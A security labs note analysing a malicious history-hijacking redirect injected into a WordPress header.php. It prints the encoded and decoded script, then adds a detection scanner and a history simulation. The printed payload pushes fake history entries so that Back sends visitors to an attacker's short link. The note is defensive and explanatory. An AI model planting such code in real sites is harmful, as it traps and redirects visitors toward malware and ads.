Undesired Redirects

Labs Note

Whether it is your own site or one you are visiting, undesired redirects and pop-ups are always annoying. The situation gets worse when your visitors start to get infected and your SEO ranking starts to drop.

During an Incident Response Investigation, we identified the following code in the header.php theme file:

< script type="text/javascript">document.write(unescape('%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%
%75%52%77%74%79%49%22%29%7d%7d%63%61%74%63%68%28%6f%29%7b%7d%7d%28%29%3b%0d%0a%3c%2f%73%63%72%69%70%74%3e'));</script > 

If we decode it for easier viewing, this is the result:

document.write(unescape('<script type="text/javascript"> ! function() {
    var t;
    try {
        for (t = 0; 10 > t; ++t) history.pushState({}, "", "");
        onpopstate = function(t) {
            t.state && location.replace("hxxps://goo.gl/uRwtyI")
        }
    } catch (o) {}
}(); </script>'))
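The decoding step above can be automated. The following script is an added example, not code from the original post or from the company that published it: it pulls every unescape('...') payload out of a file, decodes the percent-encoding itself (the same %XX and %uXXXX rules the legacy JavaScript unescape() function applies) and flags payloads that combine history.pushState, a popstate handler and a location redirect. The header.php fragment it scans is constructed for the example by re-encoding the decoded script shown above; the function and variable names are the example's own.

```javascript
// Added example: decode document.write(unescape('...')) payloads from a theme
// file and flag the pushState/popstate redirect pattern. Not from the original
// post; names and the sample file are the example's own.

// Re-implementation of the legacy JavaScript unescape(): %XX decodes to the
// character with that code, %uXXXX to that UTF-16 code unit, and anything
// else (including a lone '%') is passed through unchanged.
function jsUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (match, u, x) =>
    String.fromCharCode(parseInt(u !== undefined ? u : x, 16)));
}

// The inverse, used only to build the sample below the way the injection on
// the page was built: every character encoded, letters included.
function percentEncodeAll(s) {
  return Array.from(s, ch => {
    const c = ch.charCodeAt(0);
    return c < 256 ? '%' + c.toString(16).padStart(2, '0')
                   : '%u' + c.toString(16).padStart(4, '0');
  }).join('');
}

// Return the raw string literal inside every unescape('...') / unescape("...")
// call in a piece of source, honouring backslash escapes inside the literal.
function extractUnescapePayloads(source) {
  const re = /unescape\(\s*(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;
  const payloads = [];
  let m;
  while ((m = re.exec(source)) !== null) payloads.push(m[2]);
  return payloads;
}

// Indicators of the history-hijack redirect. All three must be present for
// the payload to be marked suspicious, so ordinary theme JavaScript that
// merely uses pushState is not flagged.
function analyzePayload(decoded) {
  const result = {
    decoded,
    pushState: /history\.pushState\s*\(/.test(decoded),
    popstateHandler: /(?:onpopstate\s*=|addEventListener\s*\(\s*["']popstate)/.test(decoded),
    redirect: /location\.(?:replace\s*\(|assign\s*\(|href\s*=)/.test(decoded),
    // Defanged hxxp(s) and live http(s) URLs alike, so the destination is visible.
    urls: decoded.match(/(?:hxxps?|https?):\/\/[^\s"'<>)]+/g) || [],
  };
  result.suspicious = result.pushState && result.popstateHandler && result.redirect;
  return result;
}

function scanThemeFile(source) {
  return extractUnescapePayloads(source).map(p => analyzePayload(jsUnescape(p)));
}

// Constructed sample: the decoded redirect script from the post, re-encoded
// and dropped into a fake header.php fragment. The short link stays defanged.
const REDIRECT_SCRIPT =
  '<script type="text/javascript">!function(){var t;try{for(t=0;10>t;++t)' +
  'history.pushState({},"","");onpopstate=function(t){t.state&&' +
  'location.replace("hxxps://goo.gl/uRwtyI")}}catch(o){}}();</script>';

const SAMPLE_HEADER_PHP = [
  '<?php wp_head(); ?>',
  "<script type=\"text/javascript\">document.write(unescape('" +
    percentEncodeAll(REDIRECT_SCRIPT) + "'));</script>",
  '<body <?php body_class(); ?>>',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const hit of scanThemeFile(SAMPLE_HEADER_PHP)) {
    console.log(hit.suspicious ? 'SUSPICIOUS' : 'ok', hit.urls);
    console.log(hit.decoded);
  }
}
```

Run it with node against a real theme file by replacing SAMPLE_HEADER_PHP with the file's contents; a payload that decodes to a plain script without the three indicators is reported but not marked suspicious, which is the intended behaviour for legitimate minified code that happens to be percent-encoded.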

The malicious code above manipulates the browser's session history with the pushState() method introduced in HTML5: it pushes ten dummy entries, each carrying a non-null state object ({}), on top of the page the visitor is actually viewing. It then installs an onpopstate handler. The browser dispatches the popstate event to the window every time the active history entry changes, which is what happens when the visitor clicks "Go back" (usually the left arrow beside the address bar), and the event carries the state object of the entry being navigated to. Because every pushed entry has a truthy state, the first click on "Back" lands on one of them and the handler calls location.replace(), sending the visitor to that goo.gl short link, which resolved to hxxp://aliveforfun.com/random/. The page's own entry has a null state, so one pushed entry would not be enough for the trap to fire; pushing ten of them makes it reliable. Using location.replace() rather than assigning location.href also overwrites the current entry, so "Back" does not bring the visitor back to the page, and the whole script is wrapped in try/catch so that browsers without pushState support fail silently instead of showing an error.
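To see why the script pushes ten entries instead of one, and what a visitor's "Back" clicks actually do, here is an added example that is not code from the original post: a small model of the browser's session history that follows the behaviour of pushState() (adds an entry and makes it current, firing nothing) and of popstate (fires on traversal, carrying the state of the entry being navigated to, with null for the entry the page was originally loaded with). The injected logic is run against that model with the browser globals swapped for the model's objects; FakeHistory, runInjectedScript and backButtonBehaviour are the example's own names. A real browser would have left the page on the first redirect; the model keeps counting to show that every pushed entry is a trap.

```javascript
// Added example: a model of the browser session history, used to replay the
// injected pushState/popstate redirect. Not code from the original post.

class FakeHistory {
  constructor() {
    // The entry the page was loaded with has a null state, exactly as a real
    // browser's initial entry does.
    this.entries = [{ state: null, url: '/' }];
    this.index = 0;
    // Stands in for window.onpopstate.
    this.onpopstate = null;
  }

  pushState(state, title, url) {
    // pushState drops any forward entries, appends a new entry after the
    // current one and makes it current. No popstate event fires.
    this.entries.splice(this.index + 1);
    this.entries.push({ state, url: url || this.entries[this.index].url });
    this.index = this.entries.length - 1;
  }

  back() {
    // Traversing to a different entry of the same document fires popstate with
    // the destination entry's state. Going back past the first entry would
    // leave the document, so nothing fires for it here.
    if (this.index === 0) return;
    this.index -= 1;
    if (this.onpopstate) this.onpopstate({ state: this.entries[this.index].state });
  }
}

// Execute the injected script against the model. `pushes` is the loop bound
// the attacker chose (10 in the sample); `log` collects every URL handed to
// location.replace, in order.
function runInjectedScript(pushes) {
  const history = new FakeHistory();
  const log = [];
  const location = { replace: url => log.push(url) };
  for (let t = 0; pushes > t; ++t) history.pushState({}, '', '');
  history.onpopstate = function (t) {
    t.state && location.replace('hxxps://goo.gl/uRwtyI');
  };
  return { history, log };
}

// Press "Back" until the visitor would leave the page and report what
// happened. A real browser navigates away on the first redirect; the model
// keeps pressing so the number of trapped entries is visible.
function backButtonBehaviour(pushes) {
  const { history, log } = runInjectedScript(pushes);
  let presses = 0;
  let firstRedirectOnPress = null;
  while (history.index > 0) {
    history.back();
    presses += 1;
    if (log.length > 0 && firstRedirectOnPress === null) firstRedirectOnPress = presses;
  }
  return {
    entriesPushed: pushes,
    backPressesToLeave: presses,
    redirects: log.length,
    firstRedirectOnPress,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const n of [1, 2, 10]) console.log(backButtonBehaviour(n));
}
```

With a single pushed entry the only "Back" press lands on the page's real entry, whose state is null, so the `t.state &&` guard blocks the redirect; with two or more, the first press lands on a pushed entry and redirects. Ten pushes give nine consecutive redirecting presses, which is why the attacker did not bother with a smaller number.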

These redirects can lead visitors to exploit kit landing pages that drop malware, to unwanted ads and pop-ups, to the execution of unauthorized scripts, and more. It is damaging to both the website owner and their visitors, which is why we recommend having a File Integrity Monitoring system in place to detect such injections as soon as they land and limit their impact. A quick manual check in the meantime is to search theme and plugin files for document.write(unescape( and for history.pushState: a percent-encoded script written into the page at load time has no place in a normal header.php.
